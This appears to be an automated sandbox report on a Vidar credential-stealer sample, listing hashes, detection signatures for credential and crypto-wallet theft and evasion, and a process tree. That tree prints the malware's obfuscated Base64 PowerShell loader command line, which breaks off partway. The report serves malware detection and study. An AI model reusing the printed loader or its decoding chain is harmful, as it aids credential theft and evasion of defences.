Windows
Analysis Report
yU3icg18lq.exe
Overview
General Information
Sample name: yU3icg18lq.exe (renamed because the original name is a hash value)
Original sample name: 8b8db4eaa6f5368eb5f64359c6197b43.exe
Analysis ID: 1416885
MD5: 8b8db4eaa6f5368eb5f64359c6197b43
SHA1: e9b51842e2d2f39fa06e466ae73af341ddffe1c8
SHA256: 55327bff1fa5fe9b81bbe47faa4c8e102fe2fc0b02148fe9677a4e44cc6d7a77
Tags: 32, exe, trojan
Detection
Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Powershell decode and execute
Yara detected Vidar
Yara detected Vidar stealer
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Searches for specific processes (likely to inject)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
- yU3icg18lq.exe (PID: 5144, cmdline: "C:\Users\user\Desktop\yU3icg18lq.exe", MD5: 8B8DB4EAA6F5368EB5F64359C6197B43)
- wscript.exe (PID: 4028, cmdline: "wscript.exe" "C:\Users\user\start.vbs", MD5: FF00E0480075B095948000BDC66E81F0)
- cmd.exe (PID: 5512, cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\temp.bat" ", MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 808, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 5304, cmdline: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KZnVuY3Rpb24gUmV2ZXJzZVN0cmluZygkaW5wdXRTdHJpbmcpIHsNCiAgICAkY2hhckFycmF5ID0gJGlucHV0U3RyaW5nLlRvQ2hhckFycmF5KCkgICMgQ29udmVydCBzdHJpbmcgdG8gY2hhcmFjdGVyIGFycmF5DQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0gICMgUmV2ZXJzZSB0aGUgYXJyYXkNCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheSAgIyBDb252ZXJ0IHRoZSByZXZlcnNlZCBhcnJheSBiYWNrIHRvIGEgc3RyaW5nDQogICAgcmV0dXJuICRyZXZlcnNlZFN0cmluZw0KfQ0KDQpmdW5jdGlvbiBDbG9zZS1Qcm9jZXNzIHsNCiAgICBwYXJhbSgNCiAgICAgICAgW3N0cmluZ10kUHJvY2Vzc05hbWUNCiAgICApDQoNCiAgICAkcHJvY2VzcyA9IEdldC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ0KDQogICAgaWYgKCRwcm9jZXNzIC1uZSAkbnVsbCkgew0KICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1Gb3JjZQ0KCX0NCn0NCg0KZnVuY3Rpb24gQ29udmVydC1Bc2NpaVRvU3RyaW5nKCRhc2NpaUFycmF5KXsNCiRvZmZTZXRJbnRlZ2VyPTEyMzsNCiRkZWNvZGVkU3RyaW5nPSROdWxsOw0KZm9yZWFjaCgkYXNjaWlJbnRlZ2VyIGluICRhc2NpaUFycmF5KXskZGVjb2RlZFN0cmluZys9W2NoYXJdKCRhc2NpaUludGVnZXItJG9mZlNldEludGVnZXIpfTsNCnJldHVybiAkZGVjb2RlZFN0cmluZ307DQoNCg0KJGVuY29kZWRBcnJheSA9IEAoMTU5LDIyMCwyMzgsMjM4LDIyNCwyMzIsMjIxLDIzMSwyNDQsMTY5LDE5MiwyMzMsMjM5LDIzNywyNDQsMjAzLDIzNCwyMjgsMjMzLDIzOSwxNjksMTk2LDIzMywyNDEsMjM0LDIzMCwyMjQsMTYzLDE1OSwyMzMsMjQwLDIzMSwyMzEsMTY3LDE1OSwyMzMsMjQwLDIzMSwyMzEsMTY0LDE4MikNCiRkZWNvZGVkU3RyaW5nID0gQ29udmVydC1Bc2NpaVRvU3RyaW5nICRlbmNvZGVkQXJyYXkNCg0KDQokZmlsZVBhdGggPSBKb2luLVBhdGggJGVudjpVc2VyUHJvZmlsZSAiLXRlbXAuYmF0Ig0KJGxhc3RMaW5lID0gR2V0LUNvbnRlbnQgLVBhdGggJGZpbGVQYXRoIHwgU2VsZWN0LU9iamVjdCAtTGFzdCAxDQokY2xlYW5lZExpbmUgPSAkbGFzdExpbmUgLXJlcGxhY2UgJ146OicNCiRyZXZlcnNlID0gUmV2ZXJzZVN0cmluZyAkY2xlYW5lZExpbmUNCiRkZWNvbXByZXNzZWRCe